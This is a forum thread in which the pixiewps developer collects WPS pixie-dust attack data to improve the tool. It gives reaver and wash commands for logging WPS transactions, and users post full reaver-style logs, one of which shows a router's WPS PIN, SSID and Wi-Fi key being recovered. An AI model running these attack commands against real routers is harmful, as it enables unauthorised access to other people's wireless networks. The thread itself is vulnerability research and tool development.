Results 1 to 7 of 7

Thread: Data gathering for pixiewps (pixie dust attack)

  1. #1
    Member
    Join Date
    Mar 2015
    Posts
    54

    Data gathering for pixiewps (pixie dust attack)

    Hi everyone,
    we have decided to start collecting data again for the WPS pixie dust attack (pixiewps), however we will be thorough this time:
    1. The data must be collected with Reaver 1.6.3 and with the new -vvv debug option (now included in kali)
    2. A set of data must contain a full transaction from M1 to M7 (thus you MUST know the PIN)
    3. 2 consecutive transactions (2 sets of data close in time) would be ideal (run reaver once, grab the data, then run reaver again, grab the new data)
    4. The data should be filtered with logfilter.py
    5. Please include the model / name of the router (possibly using wash --json for the specific router, you can edit out the BSSID and ESSID for privacy reasons)
    6. DO NOT use -S (--dh-small)
    7. Which data we want? See below:

    • (Cheap) Tenda routers (like the N304, by default they may have WPS disabled), even if pixiewps is successful
    • Realtek that pixiewps can't pwn (some RTL8671 ?)
    • Data where nonces (E-nonce) follow a weird pattern like xx:xx:00:00..., 00:00:xx:xx... etc. (eg. 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45)
    • Others cheap routers (that don't run hostapd)

    The latest pixiewps uses multi-threading so you may want to use that instead of the one included in kali. Some changes are still in the works so I won't push a new tag for now.

    UPDATE:
    We also need data for devices that have these fields:
    1. Manufacturer: D-Link Corp.
    2. WPS: Model Name: RTL8xxx
    3. WPS: Model Number: EV-2010-09-20
    4. WPS: Serial Number: 123456789012347
    5. WPS: Device Name: RTL8196d (or RTL8196e)


    Which could be:
    1. D-Link DIR-615 rev N1
    2. D-Link DIR-615S rev A1
    3. D-Link DIR-620 rev A1A
    4. D-Link DIR-620 rev E1


    From 2015 to 2017.

    To collect data you can use something like this (be sure to use the correct pin):
    Code:
    sudo -i
    reaver -vvv -i MONITOR -b BSSID -p PIN 2>&1 | tee reaver.log
    cat reaver.log | python2 logfilter.py 1>&2 2>PIXIEDATA.TXT
    wash -i MONITOR -j --scan -n 25 | grep -i BSSID | tee ROUTERDATA.JSON
    You can also copy and paste the full logs if you have problems following this procedure.

    Remember that in most cases WPS 2.0 locks after 10 FAILED attempts. After that a reboot is required to reset.

    Why collecting data again after all this time?
    Pixiewps has improved overtime, now it's more mature and so is Reaver. But there are still potential vulnerable devices out there and margins for improvement overall.

    Please keep the thread related to gathering data only. Post questions only if important. That is also the reason why I'm starting a new thread, the others are too much clogged up. Hope mods don't mind
    Last edited by wiire; 2017-11-24 at 09:50 AM. Reason: fixed example commands

  2. #2
    Junior Member
    Join Date
    Nov 2017
    Location
    Russia, Moscow
    Posts
    1
    Quote Originally Posted by wiire View Post
    The data must be collected with Reaver 1.6.3 and with the new -vvv debug option (now included in kali)
    Is it ok to post the data from latest Router Scan nightly build? Here's one for example:

    Huawei HG8245H (device #1)

    Code:
    [*] Audit started at 2017.11.22 22:06:30 (UTC+03:00).
    [*] E-Nonce: 68BE01DF8A8DB9794F3126C582F9A274
    [*] PKE: E8CCCEBB58C29F9F4850E63E2E9206623765CCC8BBC0382C531E62FD8B90BF2FC7A132F398D7E8E037160BBFAB1E30E95856FF813E88282CD2CA42CE905A9CF7FBEB9D206EF6BFDB95590030D7A3D41FC9F362F2AFF3ED9FC14534E2872C8319EFEA5524DEE674EDC43843628C9F8F02CE675DB76B4B5A679C1375420E0304136E1E7C917602598E696DEDEE76B17601C8F01E50EE8CFDC023A774670EF00B96E3DABB2E963BA81A8FFEDD699A71D41581400691D39772CF1B150D6B907279CF
    [*] Manufacturer: Huawei
    [*] Model Name: Huawei
    [*] Model Number: HG8245H
    [*] Serial Number: 39
    [*] Device Name: HuaweiONT
    [*] PKR: E40D6B624FB03754E7231B8CBECA1C049DEB272173227B768E3D2C860E9E0C8EC1FFA4D7DBD1F8B2486EDFDB510AA19EE2D6598210D135DC226BC4181AB7197993B39A7270CD7A7DD60FCA03EDE3697C1F8B21962878157169EF17D099D769CF24874A2E077696DEAAF152C485E09F733445191D6D44A22187F241F2B3A9737E96AEFAF27378775A623844AD16AA48A69B4C07772C929843D9EACF77E9FCEE514BAC7602C16A0CB8048BD52FAAB6466055EF38B630E937717060AEAD79EC59EF
    [*] AuthKey: A1778780E59EC72194AF1BC977FAE6ED1214126151D1509AA49CF0298E19CD4E
    [*] E-Hash1: 02D302C8AA7E2D3AB161C48AF29E439F438C4903E298B3FFE6F5B0845C97A58E
    [*] E-Hash2: C77B53318827FC12DF2ECFDB445BC702E848D3BBD0156D6B878221465A82B42E
    [*] E-S1: DE030256AF7F4A8D5E52FBEA277C471D
    [*] E-S2: EF25F4668C2FE0FB55BCA8973094690E
    [*] Audit stopped at 2017.11.22 22:06:39 (UTC+03:00).
    
    [*] Audit started at 2017.11.22 22:06:40 (UTC+03:00).
    [*] E-Nonce: C240EB3DAC82A15C913C893D9FACEF42
    [*] PKE: A5EA92289132F132D8ADADA9D8169C89F0645B1757E7D1FCA3FDA81D41E4501FA99641D8D4865DA72709FCC66762769826793F7FCE685ECBABBFEC880951A4A2E4C2BA45E7DE20D3FFD0BC44868DE2E1AE8C267B50DB41F6543EA358277FCA1FD98CF682CAAFE522D751DD71DD4B88B90C5BCB03195F78C6EB05376E0A437A6B657472D99E4A671A0158FCAF6CD242762B8E36E1C4A41085D8ED8DDE44588325E1AE32AB77C0953DA047F30D431C2C06DECEC4AD341FEF9C350D37935FF89690
    [*] PKR: B2A1FC3590D9C2AD249E0368C0919AD142E16144727F8E6A2BD7BF1F7A85488FBC2876189617EAA78C24E02697C81FD5D18120B31A82B84B349EA1E11E592224B8151095647C4A1EF79D47F7D1451D78380B7F0F90BFCD60D9C2E453FD54BE93152A06D030E54A72F0384E110352D68014EA8977DB61A0FCFFB38A665B3D1ACC0FED9A0EDD1A2FA0A9A438BB16AA2E5B425E9203BDDF4A71D0897551AC1879013E26985D6BB4ABF8EECCC86B22A2BFE9E8CC6BCEC215B7D2D6C57BF396BAF321
    [*] AuthKey: 8850EABC8F169ABF32C8A35AB560355665E7612729BBBBB629AA741C8AB89088
    [*] E-Hash1: 8C1CA9A83EFE84CD7E0564B11904B2B3374E2B4D386B18DB4E8AB0EE54DD3BC9
    [*] E-Hash2: 15BFE6BB5FE0198FC3B8466F038CB64291B1825CBB87784DB82296AB686782B5
    [*] E-S1: 0715E717B90532588D2448049FE0D744
    [*] E-S2: 5A3C4CEBB2EE1D30B6E822EE6CCA7450
    [*] Audit stopped at 2017.11.22 22:06:49 (UTC+03:00).
    Last edited by binarymaster; 2017-11-22 at 09:11 PM.
    by Stas'M

  3. #3
    Member
    Join Date
    Mar 2015
    Posts
    54
    Yes, thank you. Enrollee nonce, the 2 secret nonces and details like brand, model etc. are the most important data

    Sorry I haven't replied sooner, I had problems logging in on the forum.

    @everyone
    If you have troubles following the instructions, just copy and past the full logs by hand. Maybe use a pastebin or similar if you don't want to clog everything up.

  4. #4
    Junior Member
    Join Date
    Jan 2016
    Posts
    6
    ASUS ADSL home gateway, model DSL-N10E, firmware ver. 2.1.19_EU
    Realtek that pixiewps can't pwn (some RTL8671 ?)
    Data where nonces (E-nonce) follow a weird pattern like xx:xx:00:00..., 00:00:xx:xx... etc. (eg. 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45)
    2 datasets below
    Code:
    [*] Audit started at 2017.12.05 19:51:00 (UTC+02:00).
    [*] Associating with AP...
    
    [+] Associated with 74:D0:2B:84:41:D7 (ESSID: Natalya).
    [*] Trying pin "13850319"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 0000497B000030CF00003B58000042CB
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: Realtek Semiconductor Corp.
    [*] Model Name: ADSL Router
    [*] Model Number: EV-2006-07-27
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Router/Modem IGD
    [*] Sending WPS Message M2...
    [*] PKR: 3B617AD18518A5D021C6B8EB2BC8DF881CF9DF7FB00C1C4E485C8F068B4871BA5ADDD26C4F6FBFB479EF8298CFE2D39387E018656009DBD3D17F00FFA6F49D6577D48D2A84F0BF12AC111E122FD3C9F8996DB7856C38C54AD203AFF0F3E4D8D3E442DA0A67A19FE5DDB097BA7672B3504B1AC3466CDAEE183039BC8C99C5AD86787355821707B6223C6005CB1F690E0590381B93E08B1C163050AEA0A104EA22DE422B9CD76AF37D8C8C3B596A43FD0B6FB617376C2792951E8C7B231B7B8583
    [*] AuthKey: 1FB4802250487E98E4B0F9D5AD0C859348AC6CC583ECBCEB6B6B5D9D880864C1
    [*] Received WPS Message M3.
    [*] E-Hash1: 4C6143B908F5226DEE0C40078478FDFD3495571DCFEDB2A912424D79E361E3C1
    [*] E-Hash2: F6D95087CDE720EBD0DAEDD7511DE6A6A8FC6697F88579AFEF12A3F399D6D64A
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [*] E-S1: 00001003000015AE000015B700005776
    
    [+] First half found: 1385
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] E-S2: 0000139000001AF4000016B300003383
    [*] Sending WSC NACK...
    [*] EAP session closed.
    
    [+] WPS PIN: 13850319
    
    [+] SSID: Natalya
    
    [+] Key: 1234567890
    
    [+] Key Index: 1
    [*] Audit stopped at 2017.12.05 19:51:09 (UTC+02:00).
    [*] Audit started at 2017.12.05 19:51:10 (UTC+02:00).
    [*] Associating with AP...
    
    [+] Associated with 74:D0:2B:84:41:D7 (ESSID: Natalya).
    [*] Trying pin "13850319"...
    [*] Sending EAPOL Start...
    
    [-] Request timed out.
    [*] Trying pin "13850319"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 000079F70000103D000030B600007DEC
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: Realtek Semiconductor Corp.
    [*] Model Name: ADSL Router
    [*] Model Number: EV-2006-07-27
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Router/Modem IGD
    [*] Sending WPS Message M2...
    [*] PKR: 6C61743CBE029AD0455553B23F05F154A076140505CB9C29F3D3685652F4A10EAB2C7C8E8C5DD039033A08CF3CA078940C8A8A00CE7D171E364F611E897DD9486C287755E30357275D6CEB7E97101C2D71398C3E2960384B169883C9FC7068E64E680FD73558A317C197CAB19CD669F0BD65CDB57F419B91F56E6473D6A112E2D79685258D2E6AC3DD5659D45FA759BDD420BF5FA9C8702E8021BF45DE2E42488BE048A59024D9B471DC05B03B0CE7AF8945CF95848857CEF2F6C663C55218F4
    [*] AuthKey: 0EF51A6ED5BEE1647480B874EFD0400010F7D287429132E3FD912ED1B5002BE9
    [*] Received WPS Message M3.
    [*] E-Hash1: 1B761BB7DE29C0CF8839B6F0858583814F001E95EFBF918F27C640A532207941
    [*] E-Hash2: B74C37199A8FB5A22DA2EC48DE2D2919F17D658E10FFD6CFFBB92E9775480771
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [*] E-S1: 00007EB90000327A00000A9800002491
    
    [+] First half found: 1385
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] E-S2: 00000246000037BF00000B940000009E
    [*] Sending WSC NACK...
    [*] EAP session closed.
    
    [+] WPS PIN: 13850319
    [+] SSID: Natalya
    [+] Key: 1234567890
    [+] Key Index: 1
    [*] Audit stopped at 2017.12.05 19:51:25 (UTC+02:00).
    [*] Audit started at 2017.12.05 19:51:30 (UTC+02:00).
    [*] Associating with AP...
    
    [+] Associated with 74:D0:2B:84:41:D7 (ESSID: Natalya).
    [*] Trying pin "13850319"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 000071E400005D9D000073000000066A
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: Realtek Semiconductor Corp.
    [*] Model Name: ADSL Router
    [*] Model Number: EV-2006-07-27
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Router/Modem IGD
    [*] Sending WPS Message M2...
    [*] PKR: 4870430F9757C2871408F388EF668FE241502E28864A3F4D8F7E2B44D0E4BAFD284FFE81EFA5F1803C69969C49DF851BD5C65D828DBF685873C99025D565175023D142F5B73BEB807D16301853DE3B1E0427DF213B7A44820D1748576B2154620932B383142510C6D771BFAA715E1C17465456257C7010EE19E3FF7AA2DED803175D326B5BE102A0FD5B8077FD1E8359BA4AD59EB6F49F95302F4CDB3B64CE5D7FF809206B9B7125CEB288F20C18C5772699BEB04E0569229128CDD918F34B47
    [*] AuthKey: 56EB940A1260E08AD7871738D62D619EA88A163ABCC1EEEC45651B7D1991CAEE
    [*] Received WPS Message M3.
    [*] E-Hash1: DB2D80359B0D842048CB15BB3A8A55DE241B741E43459AB1938CD5A11AC5AF1F
    [*] E-Hash2: 045B9585812EE096F4325642C06739A91D9E8F5B51A5B6BC8996B91DC6A1CCFB
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [*] E-S1: 00007DBF00000A6400004ED900006529
    
    [+] First half found: 1385
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] E-S2: 0000014B00000FA900004FD500004136
    [*] Sending WSC NACK...
    [*] EAP session closed.
    
    [+] WPS PIN: 13850319
    
    [+] SSID: Natalya
    [+] Key: 1234567890
    [+] Key Index: 1[*] Audit stopped at 2017.12.05 19:51:39 (UTC+02:00).
    Last edited by ForumKali2016; 2017-12-05 at 05:56 PM.

  5. #5
    Member
    Join Date
    Mar 2015
    Posts
    54
    @ForumKali2016 Thank you very much!

    The router seems to be bugged, but not broken since the protocol goes through correctly (to M7).

    Code:
    0000497b 000030cf 00003b58 000042cb
    00001003 000015ae 000015b7 00005776
    00001390 00001af4 000016b3 00003383
    
    000079f7 0000103d 000030b6 00007dec
    00007eb9 0000327a 00000a98 00002491
    00000246 000037bf 00000b94 0000009e
    
    000071e4 00005d9d 00007300 0000066a
    00007dbf 00000a64 00004ed9 00006529
    0000014b 00000fa9 00004fd5 00004136
    Here's what you could do :
    - collect 20 - 30 consecutive sets of data, trying to keep the same distance in time between the runs (ie with a script, I'm sure @binarymaster would help)
    - record the exact date and time of the router when you start the whole process
    - check if NTP is enabled and if the router has the correct date and time set

    That would help a lot. Thank you again!
    Last edited by wiire; 2017-12-06 at 12:49 AM.

  6. #6
    Junior Member
    Join Date
    Jan 2016
    Posts
    6
    new datasets - untouched output from fresh kali distro terminal
    http://www43.zippyshare.com/v/oioRqXdZ/file.html
    Reaver started just at 18:44:00 GMT+2 08.12.2017 by router clock (or maybe +-2 sec). Delay between attempts = 1 sec or less, i tried restart reaver so fast as i can, but some miss clicks presents.

  7. #7
    Member
    Join Date
    Mar 2015
    Posts
    54
    OK, thank you! Meanwhile I think @binarymaster was adding some features to RS, to make it easier for testing / gathering data.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •